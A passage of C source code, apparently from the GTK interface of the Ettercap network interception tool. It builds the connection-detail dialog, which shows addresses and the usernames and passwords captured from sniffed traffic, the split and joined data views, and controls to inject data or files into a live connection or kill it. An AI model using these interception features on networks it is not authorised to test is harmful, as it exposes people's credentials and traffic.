col = 0; DEBUG_MSG("gtk_connection_detail"); model = GTK_TREE_MODEL (ls_conns); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 11, &c, -1); } else return; /* nothing is selected */ if(!c || !c->co) return; header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), "Connection Details"); gtk_header_bar_set_decoration_layout(GTK_HEADER_BAR(header), ":close"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); dwindow = gtk_dialog_new(); gtk_window_set_titlebar(GTK_WINDOW(dwindow), header); gtk_window_set_modal(GTK_WINDOW(dwindow), TRUE); gtk_window_set_transient_for(GTK_WINDOW(dwindow), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dwindow), GTK_WIN_POS_CENTER_ON_PARENT); gtk_container_set_border_width(GTK_CONTAINER(dwindow), 5); g_signal_connect(G_OBJECT(dwindow), "delete-event", G_CALLBACK(gtkui_connection_detail_destroy), NULL); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 5); content = gtk_dialog_get_content_area(GTK_DIALOG(dwindow)); gtk_container_add(GTK_CONTAINER(content), vbox); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_container_set_border_width(GTK_CONTAINER(grid), 8); gtk_box_pack_start(GTK_BOX(vbox), grid, FALSE, FALSE, 0); /* Layer 2 Information */ label = gtk_label_new("Layer 2 Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); g_free(markup); row++; label = gtk_label_new("Source MAC address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(mac_addr_ntoa(c->co->L2_addr1, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); row++; label = gtk_label_new("Destination MAC address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(mac_addr_ntoa(c->co->L2_addr2, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); /* Layer 3 information */ row++; label = gtk_label_new("Layer 3 Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); gtk_widget_set_margin_top(label, 10); g_free(markup); row++; label = gtk_label_new("Source IP address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(ip_addr_ntoa(&c->co->L3_addr1, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); if (EC_GBL_OPTIONS->resolve) { row++; label = gtk_label_new("Source hostname:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new("resolving..."); if (host_iptoa(&c->co->L3_addr1, name) == -E_NOMATCH) { /* IP not yet resolved - keep trying asyncronously */ struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LABEL; ro->widget = label; ro->ip = &c->co->L3_addr1; detail_timer1 = g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { gtk_label_set_text(GTK_LABEL(label), name); } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) { row++; label = gtk_label_new("Source location:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(geoip_country_by_ip(&c->co->L3_addr1)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } #endif row++; label = gtk_label_new("Destination IP address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(ip_addr_ntoa(&c->co->L3_addr2, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); if (EC_GBL_OPTIONS->resolve) { row++; label = gtk_label_new("Destination hostname:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new("resolving..."); if (host_iptoa(&c->co->L3_addr2, name) == -E_NOMATCH) { /* IP not yet resolved - keep trying asyncronously */ struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LABEL; ro->widget = label; ro->ip = &c->co->L3_addr2; detail_timer2 = g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { gtk_label_set_text(GTK_LABEL(label), name); } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) { row++; label = gtk_label_new("Destination location:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(geoip_country_by_ip(&c->co->L3_addr2)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } #endif /* Layer 4 information */ row++; label = gtk_label_new("Layer 4 Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); gtk_widget_set_margin_top(label, 10); g_free(markup); row++; label = gtk_label_new("Protocol:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); switch(c->co->L4_proto) { case NL_TYPE_UDP: label = gtk_label_new("UDP"); break; case NL_TYPE_TCP: label = gtk_label_new("TCP"); break; default: label = gtk_label_new(""); break; } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); row++; label = gtk_label_new("Source port:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new((str = g_strdup_printf("%d", ntohs(c->co->L4_addr1)))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 1, 1); g_free(str); label = gtk_label_new(service_search(c->co->L4_addr1, c->co->L4_proto)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+2, row, 1, 1); row++; label = gtk_label_new("Destination port:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new((str = g_strdup_printf("%d", ntohs(c->co->L4_addr2)))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 1, 1); g_free(str); label = gtk_label_new(service_search(c->co->L4_addr2, c->co->L4_proto)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+2, row, 1, 1); row++; label = gtk_label_new("Transferred bytes:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new((str = g_strdup_printf("%d", c->co->xferred))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); g_free(str); /* Additional information */ if (c->co->DISSECTOR.user) { row++; label = gtk_label_new("Additional Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); gtk_widget_set_margin_top(label, 10); g_free(markup); row++; label = gtk_label_new("Account:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(c->co->DISSECTOR.user); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 1, 1); label = gtk_label_new(c->co->DISSECTOR.pass); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+2, row, 1, 1); if (c->co->DISSECTOR.info) { row++; label = gtk_label_new("Additional info:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(c->co->DISSECTOR.info); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } } hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show_all(dwindow); } static void gtkui_connection_detail_destroy(GtkWidget *widget, gpointer *data) { /* unused variable */ (void) data; /* destroy timer if still running */ if (detail_timer1) g_source_remove(detail_timer1); if (detail_timer2) g_source_remove(detail_timer2); /* destroy widget */ gtk_widget_destroy(widget); } static void gtkui_connection_data(void) { GtkTreeIter iter; GtkTreeModel *model; struct conn_tail *c = NULL; DEBUG_MSG("gtk_connection_data"); model = GTK_TREE_MODEL (ls_conns); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 11, &c, -1); } else return; /* nothing is selected */ if(c == NULL || c->co == NULL) return; /* just to be safe */ /* * remove any hook on the open connection. * this is done to prevent a switch of connection * with the panel opened */ if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); /* remove the viewing flag */ curr_conn->flags &= ~CONN_VIEWING; } /* set the global variable to pass the parameter to other functions */ curr_conn = c->co; curr_conn->flags |= CONN_VIEWING; /* default is split view */ gtkui_connection_data_split(); } /* * show the content of the connection */ static void gtkui_connection_data_split(void) { GtkWidget *vbox, *scrolled, *label, *child; GtkWidget *hbox_big, *hbox_small, *button; GtkTextIter iter; char tmp[MAX_ASCII_ADDR_LEN]; char title[MAX_ASCII_ADDR_LEN+6]; static gint scroll_split = 1; DEBUG_MSG("gtk_connection_data_split"); /* if we're switching views, make sure old hook is gone */ conntrack_hook_conn_del(curr_conn, join_print_po); if(data_window) { child = gtk_bin_get_child(GTK_BIN (data_window)); gtk_container_remove(GTK_CONTAINER (data_window), child); textview3 = NULL; joinedbuf = NULL; endmark3 = NULL; } else { data_window = gtkui_page_new("Connection data", >kui_destroy_conndata, >kui_connection_data_detach); } /* don't timeout this connection */ curr_conn->flags |= CONN_VIEWING; hbox_big = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_container_add(GTK_CONTAINER(data_window), hbox_big); gtk_widget_show(hbox_big); /*** left side ***/ vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_box_pack_start(GTK_BOX(hbox_big), vbox, TRUE, TRUE, 0); gtk_widget_show(vbox); /* title */ snprintf(title, MAX_ASCII_ADDR_LEN+6, "%s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, tmp), ntohs(curr_conn->L4_addr1)); label = gtk_label_new(title); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); /* data */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview1 = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview1), GTK_WRAP_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview1), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview1), FALSE); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview1), 5); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview1), 5); gtk_container_add(GTK_CONTAINER (scrolled), textview1); gtk_widget_show(textview1); splitbuf1 = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview1)); gtk_text_buffer_create_tag (splitbuf1, "blue_fg", "foreground", "blue", NULL); gtk_text_buffer_create_tag (splitbuf1, "monospace", "family", "monospace", NULL); gtk_text_buffer_get_end_iter(splitbuf1, &iter); endmark1 = gtk_text_buffer_create_mark(splitbuf1, "end", &iter, FALSE); /* first two buttons */ hbox_small = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox_small, FALSE, FALSE, 0); gtk_widget_show(hbox_small); button = gtk_button_new_with_mnemonic("_Join Views"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_data_join), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Inject Data"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_inject), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); /*** right side ***/ vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_box_pack_start(GTK_BOX(hbox_big), vbox, TRUE, TRUE, 0); gtk_widget_show(vbox); /* title */ snprintf(title, MAX_ASCII_ADDR_LEN+6, "%s:%d", ip_addr_ntoa(&curr_conn->L3_addr2, tmp), ntohs(curr_conn->L4_addr2)); label = gtk_label_new(title); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); /* data */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview2 = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview2), GTK_WRAP_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview2), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview2), FALSE); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview2), 5); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview2), 5); gtk_container_add(GTK_CONTAINER (scrolled), textview2); gtk_widget_show(textview2); splitbuf2 = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview2)); gtk_text_buffer_create_tag (splitbuf2, "blue_fg", "foreground", "blue", NULL); gtk_text_buffer_create_tag (splitbuf2, "monospace", "family", "monospace", NULL); gtk_text_buffer_get_end_iter(splitbuf2, &iter); endmark2 = gtk_text_buffer_create_mark(splitbuf2, "end", &iter, FALSE); /* second two buttons */ hbox_small = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox_small, FALSE, FALSE, 0); gtk_widget_show(hbox_small); button = gtk_button_new_with_mnemonic("Inject _File"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_inject_file), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Kill Connection"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill_curr_conn), NULL); gtk_box_pack_start(GTK_BOX(hbox_small), button, TRUE, TRUE, 0); gtk_widget_show(button); gtk_widget_show(data_window); if(GTK_IS_WINDOW (data_window)) gtk_window_present(GTK_WINDOW (data_window)); else gtkui_page_present(data_window); /* after widgets are drawn, scroll to bottom */ g_timeout_add(500, gtkui_connections_scroll, &scroll_split); /* print the old data */ connbuf_print(&curr_conn->data, split_print); /* add the hook on the connection to receive data only from it */ conntrack_hook_conn_add(curr_conn, split_print_po); } /* detach connection data tab */ static void gtkui_connection_data_detach(GtkWidget *child) { data_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (data_window), "Connection data"); gtk_window_set_default_size(GTK_WINDOW (data_window), 600, 400); gtk_container_set_border_width(GTK_CONTAINER (data_window), 5); g_signal_connect(G_OBJECT(data_window), "delete_event", G_CALLBACK(gtkui_destroy_conndata), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(data_window, gtkui_connection_data_attach); gtk_container_add(GTK_CONTAINER(data_window), child); gtk_window_present(GTK_WINDOW (data_window)); } /* attach connection data tab */ static void gtkui_connection_data_attach(void) { if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); } gtk_widget_destroy(data_window); textview1 = NULL; textview2 = NULL; textview3 = NULL; data_window = NULL; gtkui_connection_data_split(); } /* close connection data tab */ static void gtkui_destroy_conndata(void) { DEBUG_MSG("gtkui_destroy_conndata"); if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); curr_conn->flags &= ~CONN_VIEWING; curr_conn = NULL; } gtk_widget_destroy(data_window); textview1 = NULL; textview2 = NULL; textview3 = NULL; data_window = NULL; } /* print connection data to one of the split or joined views */ /* int buffer - 1 for left split view, 2 for right split view, 3 for joined view */ /* char *data - string to print */ /* int color - 2 for blue text (used in joined view) */ static void gtkui_data_print(int buffer, char *data, int color) { GtkTextIter iter; GtkTextBuffer *textbuf = NULL; GtkWidget *textview = NULL; GtkTextMark *endmark = NULL; char *unicode = NULL; switch(buffer) { case 1: textbuf = splitbuf1; textview = textview1; endmark = endmark1; break; case 2: textbuf = splitbuf2; textview = textview2; endmark = endmark2; break; case 3: textbuf = joinedbuf; textview = textview3; endmark = endmark3; break; default: return; } /* make sure data is valid UTF8 */ unicode = gtkui_utf8_validate(data); /* if interface has been destroyed or unicode conversion failed */ if(!data_window || !textbuf || !textview || !endmark || !unicode) return; gtk_text_buffer_get_end_iter(textbuf, &iter); if(color == 2) gtk_text_buffer_insert_with_tags_by_name(textbuf, &iter, unicode, -1, "blue_fg", "monospace", NULL); else gtk_text_buffer_insert_with_tags_by_name(textbuf, &iter, unicode, -1, "monospace", NULL); gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview), endmark, 0, FALSE, 0, 0); } static void split_print(u_char *text, size_t len, struct ip_addr *L3_src) { int ret; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, text, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(text, len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(L3_src, &curr_conn->L3_addr1)) gtkui_data_print(1, dispbuf, 0); else gtkui_data_print(2, dispbuf, 0); } static void split_print_po(struct packet_object *po) { int ret; /* if not open don't refresh it */ if (!data_window) return; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(po->DATA.disp_len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(&po->L3.src, &curr_conn->L3_addr1)) gtkui_data_print(1, dispbuf, 0); else gtkui_data_print(2, dispbuf, 0); } /* * show the data in a joined window */ static void gtkui_connection_data_join(void) { GtkWidget *hbox, *vbox, *label, *scrolled, *button, *child; GtkTextIter iter; #define TITLE_LEN (MAX_ASCII_ADDR_LEN * 2) + 6 char src[MAX_ASCII_ADDR_LEN]; char dst[MAX_ASCII_ADDR_LEN]; char title[TITLE_LEN]; static gint scroll_join = 2; DEBUG_MSG("gtk_connection_data_join"); /* if we're switching views, make sure old hook is gone */ conntrack_hook_conn_del(curr_conn, split_print_po); if(data_window) { child = gtk_bin_get_child(GTK_BIN (data_window)); gtk_container_remove(GTK_CONTAINER (data_window), child); textview1 = NULL; textview2 = NULL; splitbuf1 = NULL; splitbuf2 = NULL; endmark1 = NULL; endmark2 = NULL; } else { data_window = gtkui_page_new("Connection data", >kui_destroy_conndata, >kui_connection_data_detach); } /* don't timeout this connection */ curr_conn->flags |= CONN_VIEWING; vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER(data_window), vbox); gtk_widget_show(vbox); /* title */ snprintf(title, TITLE_LEN, "%s:%d - %s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, src), ntohs(curr_conn->L4_addr1), ip_addr_ntoa(&curr_conn->L3_addr2, dst), ntohs(curr_conn->L4_addr2)); label = gtk_label_new(title); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); /* data */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); textview3 = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (textview3), GTK_WRAP_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW (textview3), FALSE); gtk_text_view_set_cursor_visible(GTK_TEXT_VIEW (textview3), FALSE); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview3), 5); gtk_text_view_set_right_margin(GTK_TEXT_VIEW (textview3), 5); gtk_container_add(GTK_CONTAINER (scrolled), textview3); gtk_widget_show(textview3); joinedbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (textview3)); gtk_text_buffer_create_tag (joinedbuf, "blue_fg", "foreground", "blue", NULL); gtk_text_buffer_create_tag (joinedbuf, "monospace", "family", "monospace", NULL); gtk_text_buffer_get_end_iter(joinedbuf, &iter); endmark3 = gtk_text_buffer_create_mark(joinedbuf, "end", &iter, FALSE); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); button = gtk_button_new_with_mnemonic("_Split View"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_data_split), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Kill Connection"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill_curr_conn), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); gtk_widget_show(data_window); if(GTK_IS_WINDOW (data_window)) gtk_window_present(GTK_WINDOW (data_window)); else gtkui_page_present(data_window); /* after widgets are drawn, scroll to bottom */ g_timeout_add(500, gtkui_connections_scroll, &scroll_join); /* print the old data */ connbuf_print(&curr_conn->data, join_print); /* add the hook on the connection to receive data only from it */ conntrack_hook_conn_add(curr_conn, join_print_po); } static gboolean gtkui_connections_scroll(gpointer data) { gint *type = data; if (type == NULL) return FALSE; if(*type == 1 && textview1 && endmark1 && textview2 && endmark2) { /* scroll split data views to bottom */ gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview1), endmark1, 0, FALSE, 0, 0); gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview2), endmark2, 0, FALSE, 0, 0); } else if(textview3 && endmark3) { /* scroll joined data view to bottom */ gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview3), endmark3, 0, FALSE, 0, 0); } /* only execute once, don't repeat */ return(FALSE); } static void join_print(u_char *text, size_t len, struct ip_addr *L3_src) { int ret; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, text, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(text, len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(L3_src, &curr_conn->L3_addr1)) gtkui_data_print(3, dispbuf, 1); else gtkui_data_print(3, dispbuf, 2); } static void join_print_po(struct packet_object *po) { int ret; /* if not focused don't refresh it */ if (!data_window) return; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(po->DATA.disp_len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(&po->L3.src, &curr_conn->L3_addr1)) gtkui_data_print(3, dispbuf, 1); else gtkui_data_print(3, dispbuf, 2); } /* * erase the connection list */ static void gtkui_connection_purge(void *conn) { struct row_pairs *row, *nextrow, *list = connections; /* variable not used */ (void) conn; DEBUG_MSG("gtkui_connection_purge"); connections = NULL; for(row = list; row; row = nextrow) { nextrow = row->next; SAFE_FREE(row); } conntrack_purge(); gtk_list_store_clear(GTK_LIST_STORE (ls_conns)); } /* * kill the selected connection connection */ static void gtkui_connection_kill(void *conn) { GtkTreeIter iter; GtkTreeModel *model; struct conn_tail *c = NULL; /* variable not used */ (void) conn; DEBUG_MSG("gtkui_connection_kill"); model = GTK_TREE_MODEL (ls_conns); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 11, &c, -1); } else return; /* nothing is selected */ if (!c || !c->co) return; /* kill it */ switch (user_kill(c->co)) { case E_SUCCESS: /* set the status */ c->co->status = CONN_KILLED; gtkui_message("The connection was killed !!"); break; case -E_FATAL: gtkui_message("Cannot kill UDP connections !!"); break; } } /* * call the specialized funtion as this is a callback * without the parameter */ static void gtkui_connection_kill_curr_conn(void) { DEBUG_MSG("gtkui_connection_kill_curr_conn"); /* kill it */ switch (user_kill(curr_conn)) { case E_SUCCESS: /* set the status */ curr_conn->status = CONN_KILLED; gtkui_message("The connection was killed !!"); break; case -E_FATAL: gtkui_message("Cannot kill UDP connections !!"); break; } } /* * inject interactively with the user */ static void gtkui_connection_inject(void) { GtkWidget *dialog, *text, *label, *vbox, *frame, *content_area; GtkWidget *button1, *button2, *hbox; GtkTextBuffer *buf; GtkTextIter start, end; char tmp[MAX_ASCII_ADDR_LEN]; gint response = 0; DEBUG_MSG("gtk_connection_inject"); if(curr_conn == NULL) return; dialog = gtk_dialog_new_with_buttons("Character Injection", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_box_pack_start(GTK_BOX(content_area), vbox, FALSE, FALSE, 0); label = gtk_label_new ("Packet 